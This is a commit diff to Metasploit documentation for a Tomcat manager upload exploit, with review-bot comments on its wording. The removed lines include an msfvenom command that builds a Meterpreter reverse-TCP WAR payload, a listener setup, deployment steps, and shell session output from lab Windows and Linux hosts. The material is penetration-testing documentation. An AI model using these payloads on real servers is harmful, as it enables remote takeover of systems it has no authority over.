removed gui stuff since it should be in tomcat_mgr_upload

bug/bundler_fix
h00die 2017-01-15 19:11:58 -05:00
parent b61ca669cf
commit 32271318e5
1 changed files with 7 additions and 72 deletions


@ -3,7 +3,10 @@ This documentation is slightly different from the standard module documentation
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
# Cleanup # Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done [manually](#manual-cleanup). It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This can be done [manually](#manual-cleanup).
# tomcat_mgr_upload
This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main difference is this uses a `PUT` HTTP request, instead of going through a `POST` HTTP request through the GUI.
## Windows (xp sp2) ## Windows (xp sp2)
### Tomcat 6 (6.0.48) ### Tomcat 6 (6.0.48)
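Review bot: changing "This must be done manually" to "This can be done manually" makes cleanup sound optional, yet the same sentence states that the exploit does NOT undeploy the shellcode, so undeploying is required whenever the target is to be left clean; keep "must" (or "needs to be done") so the requirement stays unambiguous. In the new `# tomcat_mgr_upload` section, "This module is VERY similar to ..., the main difference is this uses a `PUT` HTTP request" is a comma splice and should be two sentences; it would also help readers to say which endpoint the `PUT` goes to (the text/script interface the later sections use), since the PUT-vs-POST distinction is exactly what decides which role and `PATH` apply.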
@ -77,8 +80,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe) 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
The install was default, other than adding a user during install. No other options were changed. The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. Of note, the user was given `manager-gui` permissions by default.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script Interface Exploitation #### text/script Interface Exploitation
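Review bot: the replacement sentence contradicts the one it replaces without saying which is correct: the old text states the installer did not actually define the `manager-gui` role for the user, the new text states the user "was given `manager-gui` permissions by default". Dropping the follow-up sentence ("the `/manager/html` page was visible, but deploying from there wasn't possible") also removes the reason this section then exploits through the text/script interface. Verify which role the user really ends up with after the default install, state that, and keep a one-line note explaining why the GUI path is not used here.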
@ -132,9 +134,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows Meterpreter : java/windows
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat 8 (8.0.39) ### Tomcat 8 (8.0.39)
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
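Review bot: removing the `#### gui Interface` subsection matches the commit message, but its body carried this section's only pointer to `[Manual exploitation is possible](#manual-exploitation)`, and that target section is deleted further down in this same commit; check that nothing left in the file (including the `# Cleanup` paragraph) still links to `#manual-exploitation`, and consider replacing the deleted paragraph with a one-line cross-reference to the `tomcat_mgr_upload` documentation so a reader whose account only has `manager-gui` still knows where to look.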
@ -144,8 +143,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe) 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
The install was default, other than adding a user during install. No other options were changed. The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. Of note, the user was given `manager-gui` permissions by default.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script Interface Exploitation #### text/script Interface Exploitation
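Review bot: "was given `manager-gui` permissions by default" replaces a statement that the role was not actually defined, and the sentence explaining why deployment through `/manager/html` failed is dropped, so the Tomcat 8 section no longer says why it moves on to the text/script interface. This paragraph duplicates the Tomcat 7 Windows paragraph almost verbatim, so the role claim should be checked once against the installed configuration and the same wording applied to both sections.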
@ -195,9 +193,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows Meterpreter : java/windows
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
## Linux ## Linux
### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
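Review bot: the deleted paragraph also recorded that the `check` command's `serverinfo` URL could not be located for the GUI path. If that is a real gap in the module's `check` behaviour rather than a documentation problem, it should be tracked somewhere (a module issue or the `tomcat_mgr_upload` docs) instead of disappearing with this hunk; if it was only a documentation note, a short sentence saying `check` targets the text/script interface would keep that information for readers.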
@ -317,9 +312,6 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
Meterpreter : x86/linux Meterpreter : x86/linux
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
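Review bot: the unchanged context line following the deleted block writes the role as `'manager'` in single quotes and says "as of 7", where every other section writes the role in backticks and says "as of Tomcat 7"; since this hunk already touches the section, fix the quoting and the version wording so the four per-version paragraphs read the same.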
@ -381,63 +373,6 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
Meterpreter : x86/linux Meterpreter : x86/linux
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
# Manual Exploitation
## Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
* Tomcat 6.0.48: `manager`
* Tomcat 7.0.73: `manager-gui`
* Tomcat 8.0.39: `manager-gui`
```
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
```
## Setup Handler
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
```
## Deploy
1. With a web browser, browse to `http://<ip>:<port>/manager/html`
2. Enter credentials (no default)
3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
## Callback
After browsing to that page, code execution will happen, and your callback will hit.
```
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Manual Cleanup ## Manual Cleanup
This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat. Manual cleanup can be done by logging into the `/manager` website. From there, click `Undeploy` within the `Application` list to remove the malicious app from Tomcat.